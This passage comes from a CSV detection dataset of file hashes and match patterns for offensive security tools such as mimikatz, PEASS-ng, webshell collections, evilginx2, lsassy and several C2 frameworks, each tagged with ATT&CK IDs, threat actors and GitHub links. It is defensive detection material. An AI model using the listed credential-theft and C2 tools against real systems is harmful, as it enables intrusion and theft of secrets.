fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","39995" "*d92e344caa4b6b913bad4f77a2bd6e771434a95a4fd2c8cea0fec75edba58568*",".{0,1000}d92e344caa4b6b913bad4f77a2bd6e771434a95a4fd2c8cea0fec75edba58568.{0,1000}","offensive_tool_keyword","AV_Evasion_Tool","Undetectable Payload Generator Tool","T1027 - T1036 - T1059 - T1107","TA0005","N/A","N/A","Defense Evasion","https://github.com/1y0n/AV_Evasion_Tool","1","0","#filehash","N/A","10","10","2680","406","2023-12-08T07:38:06Z","2020-04-24T01:11:09Z","39996" "*D934058E-A7DB-493F-A741-AE8E3DF867F4*",".{0,1000}D934058E\-A7DB\-493F\-A741\-AE8E3DF867F4.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","0","#GUIDproject","N/A","N/A","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","39997" "*D934058E-A7DB-493F-A741-AE8E3DF867F4*",".{0,1000}D934058E\-A7DB\-493F\-A741\-AE8E3DF867F4.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege 
Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#GUIDproject","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","39998" "*d941534ce99193cc7771684318af13748af81cf4a9a5b4fb02c791e066b563b2*",".{0,1000}d941534ce99193cc7771684318af13748af81cf4a9a5b4fb02c791e066b563b2.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","39999" "*d945ab8284b62d5c8471a5eb71a852ba36b18770a7d334c952eb8367daf11e7b*",".{0,1000}d945ab8284b62d5c8471a5eb71a852ba36b18770a7d334c952eb8367daf11e7b.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","40000" "*d94ce7fd1fd2012d893891f6577ec1f978aea6165d003120f7d057f25e767645*",".{0,1000}d94ce7fd1fd2012d893891f6577ec1f978aea6165d003120f7d057f25e767645.{0,1000}","offensive_tool_keyword","antSword","cross-platform website management toolkit - abused by attackers - supports the use of web shells","T1505.003 - T1059 - T1100 - T1027 - T1219 - T1071","TA0002 - TA0003 - TA0005 - TA0011","antSword webshell","APT41 - 
APT15","C2","https://github.com/AntSwordProject/antSword","1","0","#filehash","N/A","10","10","4010","616","2025-01-20T12:48:42Z","2016-03-11T09:28:00Z","40003" "*d94e140fdb653c7fbfbc293a5f5ec37b012470dc4c2767b0040daf54aafb47f9*",".{0,1000}d94e140fdb653c7fbfbc293a5f5ec37b012470dc4c2767b0040daf54aafb47f9.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","40004" "*d94e140fdb653c7fbfbc293a5f5ec37b012470dc4c2767b0040daf54aafb47f9*",".{0,1000}d94e140fdb653c7fbfbc293a5f5ec37b012470dc4c2767b0040daf54aafb47f9.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - 
APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","40005" "*d95bb95780308e82ee8ab7e0a2bb1867a94ab91f96ce11413ba02a15a16750f9*",".{0,1000}d95bb95780308e82ee8ab7e0a2bb1867a94ab91f96ce11413ba02a15a16750f9.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","40006" "*d9770865ea739a8f1702a2651538f4f4de2d92888d188d8ace2c79936f9c2688*",".{0,1000}d9770865ea739a8f1702a2651538f4f4de2d92888d188d8ace2c79936f9c2688.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","40007" 
"*d9770865ea739a8f1702a2651538f4f4de2d92888d188d8ace2c79936f9c2688*",".{0,1000}d9770865ea739a8f1702a2651538f4f4de2d92888d188d8ace2c79936f9c2688.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","40008" "*d97e7cfd07d94c8282968f0334349056364f4e040a649f43577b9992204e2790*",".{0,1000}d97e7cfd07d94c8282968f0334349056364f4e040a649f43577b9992204e2790.{0,1000}","offensive_tool_keyword","AV_Evasion_Tool","Undetectable Payload Generator Tool","T1027 - T1036 - T1059 - T1107","TA0005","N/A","N/A","Defense Evasion","https://github.com/1y0n/AV_Evasion_Tool","1","0","#filehash","N/A","10","10","2680","406","2023-12-08T07:38:06Z","2020-04-24T01:11:09Z","40009" "*d97f43bd7924dfd635d36d53e2bf95c850f36bf2210d159aa602b87162aceaa6*",".{0,1000}d97f43bd7924dfd635d36d53e2bf95c850f36bf2210d159aa602b87162aceaa6.{0,1000}","offensive_tool_keyword","AppProxyC2","simple POC to show how to tunnel 
traffic through Azure Application Proxy","T1090 - T1572 - T1071","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/xpn/AppProxyC2","1","0","#filehash","N/A","9","10","69","18","2021-04-21T13:02:15Z","2021-04-21T10:46:16Z","40010" "*d98257f09b98cbb4c3241bd07a49c3acbef8face07820d52ffad0ab030c9a4c6*",".{0,1000}d98257f09b98cbb4c3241bd07a49c3acbef8face07820d52ffad0ab030c9a4c6.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","40011" "*d9845e849fc9239f6f2342103defd46e0fd67d11d54b152cd7d9645e892eca15*",".{0,1000}d9845e849fc9239f6f2342103defd46e0fd67d11d54b152cd7d9645e892eca15.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","40012" "*d987f5f570ddac113c3083de784aac66b7550f639fb0cdd6d88bed99ae21821c*",".{0,1000}d987f5f570ddac113c3083de784aac66b7550f639fb0cdd6d88bed99ae21821c.{0,1000}","offensive_tool_keyword","TunnelVision","TunnelVision uses DHCP option 121 to manipulate routing tables and decloak VPN traffic","T1557 - T1498.003","TA0009 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/leviathansecurity/TunnelVision","1","0","#filehash","N/A","9","2","132","17","2024-05-08T19:40:13Z","2024-03-11T22:24:56Z","40013" "*d98fe823414e86c47619bc51a10d542d5be44ab64387e578ba4c21bf8cef9e15*",".{0,1000}d98fe823414e86c47619bc51a10d542d5be44ab64387e578ba4c21bf8cef9e15.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 
- TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","40014" "*d9908a88e10620582a234427cb1029dbc914ecce23b98f95e065d25ea08bcde2*",".{0,1000}d9908a88e10620582a234427cb1029dbc914ecce23b98f95e065d25ea08bcde2.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","40015" "*d9940f5a09a04a949545eedb6818ce0ce001cc7596a63959e0940d31b6dc4834*",".{0,1000}d9940f5a09a04a949545eedb6818ce0ce001cc7596a63959e0940d31b6dc4834.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","Earth Lusca","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","#filehash","N/A","8","10","11931","1725","2025-04-20T11:30:29Z","2020-11-13T16:35:20Z","40016" "*d99a506000fb5bb53cc19e3b33f742db07b36b8e6f71375584faf9308474a9e4*",".{0,1000}d99a506000fb5bb53cc19e3b33f742db07b36b8e6f71375584faf9308474a9e4.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#filehash","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","40017" "*d99bc545d75d6d7bcb95e5cebb2f469da2c0778b6ee294e190f02100b8a4f0a7*",".{0,1000}d99bc545d75d6d7bcb95e5cebb2f469da2c0778b6ee294e190f02100b8a4f0a7.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense 
Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","40018" "*d99dc267a1f57d53c4c3692457e669326615010fd35011ef2c1ce18239344869*",".{0,1000}d99dc267a1f57d53c4c3692457e669326615010fd35011ef2c1ce18239344869.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","40019" "*d99f3036f858ed7c0ff1da150b7bcc8a41b0fd422e36f9d6843091221ea5be01*",".{0,1000}d99f3036f858ed7c0ff1da150b7bcc8a41b0fd422e36f9d6843091221ea5be01.{0,1000}","offensive_tool_keyword","Sublist3r","Sublist3r is a python tool designed to enumerate subdomains of websites using OSINT. It helps penetration testers and bug hunters collect and gather subdomains for the domain they are targeting. Sublist3r enumerates subdomains using many search engines such as Google. Yahoo. Bing. Baidu and Ask. Sublist3r also enumerates subdomains using Netcraft. Virustotal. ThreatCrowd. DNSdumpster and ReverseDNS. subbrute was integrated with Sublist3r to increase the possibility of finding more subdomains using bruteforce with an improved wordlist. 
The credit goes to TheRook who is the author of subbrute.","T1210.001 - T1190 - T1574.001","TA0007 - TA0002 - TA0010","N/A","ENERGETIC BEAR","Reconnaissance","https://github.com/aboul3la/Sublist3r","1","0","#filehash","N/A","5","10","10300","2148","2024-08-02T00:00:30Z","2015-12-15T00:55:25Z","40020" "*d9a081fa68e6e0450c6f04497d7926f1e8a2fbcc2893ffeffe6aec1ee1ab283f*",".{0,1000}d9a081fa68e6e0450c6f04497d7926f1e8a2fbcc2893ffeffe6aec1ee1ab283f.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","40021" "*d9a59aa8f8ad46ccf0f3a9ed564c3774ec4d7153bae8795b6668e9b850c08533*",".{0,1000}d9a59aa8f8ad46ccf0f3a9ed564c3774ec4d7153bae8795b6668e9b850c08533.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","40022" "*d9adb9ecfa37595ce0dd2d8b4841334b32243bd30455fba4f59ce44a33efcdc4*",".{0,1000}d9adb9ecfa37595ce0dd2d8b4841334b32243bd30455fba4f59ce44a33efcdc4.{0,1000}","offensive_tool_keyword","adfsbrute","test credentials against Active Directory Federation Services (ADFS) allowing password spraying or bruteforce attacks","T1110.003 - T1110.001 - T1110","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/ricardojoserf/adfsbrute","1","0","#filehash","N/A","8","2","172","33","2021-04-23T16:43:59Z","2020-10-02T16:28:35Z","40023" 
"*d9b1338f0cd7c0166a66b809e6c0519efbc37ad5b6a318454daa6f71693ba910*",".{0,1000}d9b1338f0cd7c0166a66b809e6c0519efbc37ad5b6a318454daa6f71693ba910.{0,1000}","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0005 - TA0004","N/A","Evilnum","Defense Evasion","https://github.com/hfiref0x/UACME","1","0","#filehash","N/A","10","10","6711","1348","2025-03-09T03:33:26Z","2015-03-28T12:04:33Z","40025" "*d9b2ed1ac7727c0ca511742ff66c52de2adc1f8af1cf9751c9c3153233121ad7*",".{0,1000}d9b2ed1ac7727c0ca511742ff66c52de2adc1f8af1cf9751c9c3153233121ad7.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","40026" "*d9b41241dd303f1ab21a96e85254e237e3fe95e9a325ccc1c87bf2dafe066427*",".{0,1000}d9b41241dd303f1ab21a96e85254e237e3fe95e9a325ccc1c87bf2dafe066427.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","40027" "*d9b60cb1a10bd59a3cfa900e13ffd3592b214c9c22a9cf3812581ac845c3c594*",".{0,1000}d9b60cb1a10bd59a3cfa900e13ffd3592b214c9c22a9cf3812581ac845c3c594.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","40028" 
"*d9b74200f9ac68b21bf978956eceaaf1ac34f96a47833928714b8f1857bccf2b*",".{0,1000}d9b74200f9ac68b21bf978956eceaaf1ac34f96a47833928714b8f1857bccf2b.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#filehash","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","40030" "*d9b9491fbe838aa7d97c46ef81f42c9c9748aabec0697d9abde6ddd6b464c1eb*",".{0,1000}d9b9491fbe838aa7d97c46ef81f42c9c9748aabec0697d9abde6ddd6b464c1eb.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","40031" "*d9c7dc1a5a792486cc3853620eb700e26a047238ba92c757b4f9d40605dbd3b8*",".{0,1000}d9c7dc1a5a792486cc3853620eb700e26a047238ba92c757b4f9d40605dbd3b8.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER - Black Basta","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","40033" "*d9c8a6fa2ba159dea9e2bbeb86f0d329f996bbf51ff326d194968c2153aabea5*",".{0,1000}d9c8a6fa2ba159dea9e2bbeb86f0d329f996bbf51ff326d194968c2153aabea5.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","40034" "*d9ce9dfbdd4f95ad01fc05855235d6894ef878d6d02706e6c91720ee8a4fb5bf*",".{0,1000}d9ce9dfbdd4f95ad01fc05855235d6894ef878d6d02706e6c91720ee8a4fb5bf.{0,1000}","offensive_tool_keyword","CACTUSTORCH","A JavaScript and VBScript shellcode launcher. This will spawn a 32 bit version of the binary specified and inject shellcode into it.","T1055.011 - T1059.005 - T1059.007","TA0002 - TA0005","N/A","APT32","Exploitation tool","https://github.com/mdsecactivebreach/CACTUSTORCH","1","0","#filehash","N/A","8","10","1006","227","2018-07-03T06:47:36Z","2017-07-04T10:20:34Z","40035" "*d9d30d28c1f342516cf9be162135f570ad63e591ce2a1a6056c96e525b635fbb*",".{0,1000}d9d30d28c1f342516cf9be162135f570ad63e591ce2a1a6056c96e525b635fbb.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","40036" "*d9d5daaecd31c7616b01456da34cb3b51006b5a7697af4cadfa8167e7a8b6f81*",".{0,1000}d9d5daaecd31c7616b01456da34cb3b51006b5a7697af4cadfa8167e7a8b6f81.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","Earth Lusca","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","#filehash","N/A","8","10","11931","1725","2025-04-20T11:30:29Z","2020-11-13T16:35:20Z","40037" "*d9dd9d8ef1406c7ad002253fc6e65d035037267640f44338e9468e219f95bf3b*",".{0,1000}d9dd9d8ef1406c7ad002253fc6e65d035037267640f44338e9468e219f95bf3b.{0,1000}","offensive_tool_keyword","XiebroC2","Command and control server - multi-person collaborative penetration testing graphical framework","T1105 - T1573.001 - T1055.001 - T1071 - T1041 - T1059.001 - T1059.008 - T1102","TA0011 - TA0003 - TA0005 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/INotGreen/XiebroC2","1","0","#filehash","N/A","10","10","1200","192","2025-02-28T09:44:43Z","2024-02-15T15:46:07Z","40039" "*d9ddddcdbf8d02342414c807640f951c8c49e69f15d0f8a45fd0a8a606f5229c*",".{0,1000}d9ddddcdbf8d02342414c807640f951c8c49e69f15d0f8a45fd0a8a606f5229c.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - 
T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","40040" "*d9e138fbb6a18ba5a8f9405a45144f86211187609b158f862eba7a942360b3a1*",".{0,1000}d9e138fbb6a18ba5a8f9405a45144f86211187609b158f862eba7a942360b3a1.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","40041" "*d9e58e0a47eacc9ccb42322516dcd21658aedb39e1dd64ff4af86e4fca648ddc*",".{0,1000}d9e58e0a47eacc9ccb42322516dcd21658aedb39e1dd64ff4af86e4fca648ddc.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","0","#filehash","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","40042" "*d9fb91ea8b177ea86eefc1a62a875e55136fa268aa762fa44a377023f89b7673*",".{0,1000}d9fb91ea8b177ea86eefc1a62a875e55136fa268aa762fa44a377023f89b7673.{0,1000}","offensive_tool_keyword","Poshito","Poshito is a Windows C2 over Telegram","T1102 - T1071.001 - T1571 - T1027","TA0011 - TA0005","N/A","N/A","C2","https://github.com/itaymigdal/Poshito","1","0","#filehash","N/A","7","10","10","1","2024-10-30T10:40:41Z","2024-09-10T20:14:17Z","40043" 